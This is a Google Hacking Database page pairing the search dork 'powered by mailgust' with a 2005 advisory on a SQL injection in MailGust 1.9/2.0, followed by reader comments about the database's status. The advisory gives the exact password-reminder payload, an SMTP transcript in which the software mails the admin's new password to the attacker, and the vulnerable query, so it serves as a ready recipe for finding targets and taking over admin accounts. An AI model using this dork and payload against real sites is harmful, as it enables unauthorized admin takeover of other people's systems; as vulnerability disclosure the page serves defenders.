GHDB « Hackers For Charity

GHDB

GHDB

Google Search: “powered by mailgust”

rgod rates this entry 10 out of 10.
Submitted: 2005-09-26 00:00:00
Added by: rgod
Hits: 1231
Score: 10

MailGust 1.9/2.0 (possibly prior versions) SQL injection / board takevorsoftware:site: http://www.mailgust.org/description:Mailgust is three softwares in one: * Mailing list manager * Newsletter distribution tool * Message Board Mailgust is written in php and uses a mysql database. vulnerability:if magic quotes off -> SQL Injectionwithout to have an account, a user can send himself a new admin password usingpassword reminder, in email field type:[yuor_email],’or’a'=’a'/*@hotmail.comgive a look to what happen:220 [MAILSERVER] SMTP Service readyHELO [MAILGUST]250 [MAILSERVER].MAIL FROM:250 MAIL FROM: OKRCPT TO:<[your_email]>250 RCPT TO:>[your_email] OKRCPT TO:<'or'a'='a'/*@hotmail.com>250 RCPT TO:<'or'a'='a'/*@hotmail.com> OKDATA354 Start mail input; end with .Date: Sat, 24 Sep 2005 16:11:38 +0100Subject: New passwordTo: [your_email],’or’a'=’a'/*@hotmail.comFrom: systemxxx@localhost.comYour login name is: [admin_email]Your new password is: 4993587Click here:http://localhost/mailgust/index.php?method=activate_new_password&list=maillistuser&pwd=4993587&id=1756185114to activate the password, than try to log in!It is recommended that you change your password afterwards..250 <4335105B00009AE2> Mail acceptedQUIT221 [MAILSERVER] QUITvulnerable query is in [path_to_mailgust]/gorum/user_email.php at line 363:…$query = “SELECT * FROM $applName”.”_$userClassName “. “WHERE email=’$this->email’”;…it becomes:SELECT * FROM maillist_maillistuser WHERE email=’[yuor_email],’or’a'=’a'/*@hotmail.com’”or’a'=’a'” is always true, so the query is always true, script doesn’t fail, for mail function, theese are two valid email address,it will send the mail to [your_email] and to ‘or’a'=’a'/*@hotmail.com ;)activate the password, now you can login with [admin_email] as user and new passwordu can find my poc exploit here:http://rgod.altervista.org/maildisgust.html

Comments:


5 Responses to “GHDB”

  1. Jack says:
    October 26, 2011 at 9:12 pm

    Does GHDB still updates for now?

  2. Johnny says:
    October 27, 2011 at 3:31 am

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:
    April 20, 2013 at 7:10 am

    Hi Johnny,been a while since I’ve came last. Aren’t you gonna update this website anymore???

  4. Johnny says:
    April 27, 2013 at 5:10 am

    The GHDB is not updated and lives with the exploitdb: http://http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:
    May 7, 2013 at 7:38 am

    Is any offline view-able resources is available of this product ?

Leave a Reply